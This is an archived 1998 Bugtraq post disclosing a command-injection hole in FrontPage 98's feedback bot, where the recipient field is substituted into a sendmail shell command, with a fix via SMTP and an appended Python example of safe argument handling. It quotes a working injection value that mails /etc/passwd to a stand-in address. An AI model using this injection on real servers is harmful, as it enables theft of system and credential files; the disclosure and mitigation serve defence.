[8212] in bugtraq


Re: Followup to FP98 and other Frontpage bugs

daemon@ATHENA.MIT.EDU (Markus Stumpf)
Wed Oct 14 15:41:13 1998

Date: 	Wed, 14 Oct 1998 02:21:34 +0200
Reply-To: Markus Stumpf <maex-lists-bugtraq@SPACE.NET>
From: Markus Stumpf <maex-lists-bugtraq@SPACE.NET>
X-To:         pedward@WEBCOM.COM
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <199810121822.LAA11180@eris.webcom.com>; from pedward@WEBCOM.COM
              on Mon, Oct 12, 1998 at 11:22:38AM -0700

On Mon, Oct 12, 1998 at 11:22:38AM -0700, pedward@WEBCOM.COM wrote:
> So, here is the status of Frontpage and its (in)security.

Don't know whether this has already been reported.
I've noticed another weakness which is still present at least in
FP98 with the version id:
    FPVersion="3.0.2.1330"

When installing a server for Frontpage it creates a file (usually)
   /usr/local/frontpage/www.example.com:80.cnf

In order to get the feedback bot working for sending feedback via eMail
you can define within this file
    SendmailCommand:/usr/sbin/sendmail %r
The "%r" above is substituted with the recipient's email address(es).

With this setting you are vulnerable, as creating a feedback page
with a recipient address of e.g.
        `/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd`
will execute the command
    /usr/sbin/sendmail `/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd`
and send the password file to nobody@example.com.

To avoid this, tell Frontpage to use the SMTP protocol to send emails
by using
    SMTPHost:mail.example.com
and you may probably also use
    MailSender:webmaster@example.com


        \Maex

--
SpaceNet GmbH          |   http://www.Space.Net/   | In a world without
Research & Development | mailto:research@Space.Net |   walls and fences,
Frankfurter Ring 193a  |  Tel: +49 (89) 32356-0    | who needs
D-80807 Muenchen       |  Fax: +49 (89) 32356-299  |   Windows and Gates?
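
Added example, not part of the original post and not FrontPage code: the "%r" substitution described above, shown as the shell-string pattern next to an argv-based expansion that validates each recipient and never involves a shell. The function names and the address allow-list are assumptions made for this illustration.

```python
import re
import shlex

# Allow-list for a recipient address: deliberately stricter than RFC 822.
# The first character must be alphanumeric, so a leading "-" (option
# injection) is rejected along with every shell metacharacter.
ADDR_RE = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?"
)

# Recipient string quoted from the post above.
PAYLOAD = "`/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd`"


def unsafe_command_line(template, recipient):
    """Vulnerable pattern: textual substitution into a string for /bin/sh."""
    return template.replace("%r", recipient)


def validate_recipient(addr):
    """Return addr unchanged if it matches the allow-list, else raise."""
    if not ADDR_RE.fullmatch(addr):
        raise ValueError("rejected recipient address: %r" % (addr,))
    return addr


def build_sendmail_argv(template, recipients):
    """Hardened pattern: expand the template into an argv list, no shell."""
    argv = []
    for token in shlex.split(template):
        if token == "%r":
            # Each recipient becomes its own argv element after validation.
            argv.extend(validate_recipient(r) for r in recipients)
        else:
            argv.append(token)
    return argv


if __name__ == "__main__":
    tpl = "/usr/sbin/sendmail %r"
    print(unsafe_command_line(tpl, PAYLOAD))   # backticks would reach the shell
    print(build_sendmail_argv(tpl, ["webmaster@example.com"]))
    # The list would be run with subprocess.run(argv, input=msg, shell=False)
    try:
        build_sendmail_argv(tpl, [PAYLOAD])
    except ValueError as exc:
        print(exc)
```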
